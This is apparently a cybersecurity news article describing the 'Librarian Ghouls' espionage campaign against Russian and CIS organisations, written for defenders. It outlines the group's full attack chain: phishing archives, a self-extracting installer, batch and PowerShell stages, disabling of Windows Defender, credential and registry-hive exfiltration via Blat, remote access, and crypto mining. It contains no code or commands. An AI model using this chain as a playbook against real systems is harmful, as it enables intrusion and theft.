A sophisticated cyber espionage campaign attributed to the advanced persistent threat (APT) group known as “Librarian Ghouls” also tracked as “Rare Werewolf” and “Rezet” continues to target organizations in Russia and the CIS region.

The group is notable for its extensive use of legitimate third-party utilities and off-the-shelf tools, which complicates both detection and attribution efforts.

Activity from this actor has persisted through May 2025, with a surge in attacks following a brief lull in late 2024.

Infection Vector

Librarian Ghouls leverage highly targeted spear-phishing emails delivered in the Russian language.

According to Secure List Report, these emails contain password-protected archives mimicking official documents, such as payment orders.

The infection is triggered when victims extract and open these files, which initiate a self-extracting installer created with Smart Install Maker.

Upon execution, the installer deploys benign decoys, the curl utility, and a LNK shortcut, all placed within the C:\Intel directory.

The core malicious functionality is orchestrated via command and PowerShell scripts encoded in the installer’s configuration file.

These scripts automate several key actions: deploying the legitimate 4t Tray Minimizer (used to mask malicious windows in the system tray), extracting further payloads, and enabling remote access.

The installer executes a batch file (rezet.cmd), which downloads additional binaries from a command-and-control (C2) server.

These include a custom WinRAR executable (driver.exe), the mail-sending tool Blat (blat.exe), AnyDesk for remote desktop control, Defender Control to disable Windows Defender protections, and further batch scripts.

The attack chain continues with the deployment of scheduled tasks designed to shut down the compromised system at 5 AM daily, hindering victim awareness and providing a window for attacker activities.

A PowerShell script (wol.ps1) is leveraged to wake the system and launch Microsoft Edge at 1 AM, ensuring the device is available for remote sessions before the scheduled daily shutdown.

Exfiltration mechanisms use Blat to collect and transmit credentials, including those for cryptocurrency wallets, browser passwords, registry hives (HKLM\SAM, HKLM\SYSTEM), and seed phrases.

Crypto Mining

Towards the end of the infection chain, the threat actors install a crypto miner by downloading an installer from attacker infrastructure.

This installer checks for existing miner processes and downloads the XMRig mining toolset if not detected.

The miner is configured via a local JSON file and designed to maximize efficiency by collecting system specs, including CPU, RAM, and GPU information, all of which are also communicated to the C2 servers.

Persistence is maintained through scheduled tasks and the deployment of additional legitimate utilities such as Mipko Personal Monitor (for keylogging and screenshots), WebBrowserPassView (for password collection), ngrok (reverse proxy), and NirCmd for covert script execution.

Analysis of the attacker’s infrastructure has identified multiple active C2 domains and public-facing web servers with directory listing enabled, exposing stored malicious payloads.

The majority of observed victims are Russian industrial enterprises and educational institutions, with additional targets in Belarus and Kazakhstan.

All phishing artifacts and decoy documents are localized for Russian-speaking users, aligning with the threat actor’s known focus.

Librarian Ghouls exhibit traits commonly found in hacktivist operations: frequent updates to their toolset, reliance on scripting, and avoidance of custom malware binaries in favor of widely available legitimate utilities.

The group continues to refine its methods, notably expanding into credential phishing and multi-stage data exfiltration while maintaining a strong emphasis on operational stealth.

Indicators of Compromise (IOC)

Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Update